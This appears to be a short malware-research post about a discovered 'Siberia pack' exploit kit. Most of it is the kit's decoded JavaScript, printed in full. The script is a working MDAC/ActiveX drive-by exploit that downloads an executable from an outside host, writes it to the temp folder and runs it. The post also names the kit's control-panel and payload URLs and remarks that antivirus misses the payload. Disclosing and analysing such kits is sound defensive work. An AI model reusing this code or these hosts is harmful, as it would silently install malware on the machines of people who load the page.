Just discovered another exploit kit.
According to its control panel
www.useranalyticsreporting.net/ir/pack/stat.php
it's "Siberia pack"
I wouldn't label it "kit", because it contains only a single exploit for MDAC.
Obfuscated script starts here:
www.useranalyticsreporting.net/ir/pack/
This is the decoded script
url = 'http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
function mdac() {
url = '';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
if(!r){try{r=o.GetObject('',n)}catch(e){}}
if(!r){try{r=o.GetObject(n,'')}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
function Go(a){
var eurl='http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
var fname='hfdhfd.exe';
var fso=CreateO(a,'Scripting.FileSystemObject')
var sap=CreateO(a,'Shell.Application');
var x=CreateO(a,'ADODB.Stream');
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,'Micr'+'osoft.XMLH'+'TTP');nl.open('GET',eurl,false);}
catch(e){try{nl=CreateO(a,'MSXML2.XMLHTTP');nl.open('GET',eurl,false);}
catch(e){try{nl=CreateO(a,'MSXML2.ServerXMLHTTP');nl.open('GET',eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open('GET',eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
function mdac() {
var i=0;
var target=new Array(
'BD96C556-65A3-11D0-983A-00C04FC29E36',
'BD96C556-65A3-11D0-983A-00C04FC29E30',
'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
'0006F033-0000-0000-C000-000000000046',
'0006F03A-0000-0000-C000-000000000046',
'6e32070a-766d-4ee6-879c-dc1fa91d2fc3',
'6414512B-B978-451D-A0D8-FCFDF33E833C',
'7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
'06723E09-F4C2-43c8-8358-09FCD1DB0766',
'639F725F-1B2D-4831-A9FD-874847682010',
'BA018599-1DB3-44f9-83B4-461454C84BF8',
'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
'E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
while(target[i]){
var a=null;
a=document.createElement('object');
a.setAttribute('classid','clsid:'+target[i]);
if(a){try{var b=CreateO(a,'Shell.Application');if(b){Go(a);}}catch(e){}}
i++;
}
return 0;
}
function lala1() {
return mdac();
}
function lala2() {
return lala1();
}
function lala3() {
return lala2();
}
function lala4() {
return lala3();
}
function lala5() {
return lala4();
}
lala5();
}
mdac();
The payload isn't detected by any av product currently.
http://www.virustotal.com/analisis/1d25db57afd24594c98399e1bfc24da13fc88f2a4367f0609753ef8fb2e726d1-1261341921http://www.threatexpert.com/report.aspx?md5=8e36fdfa3a6fdc319d2fa8a5948fc481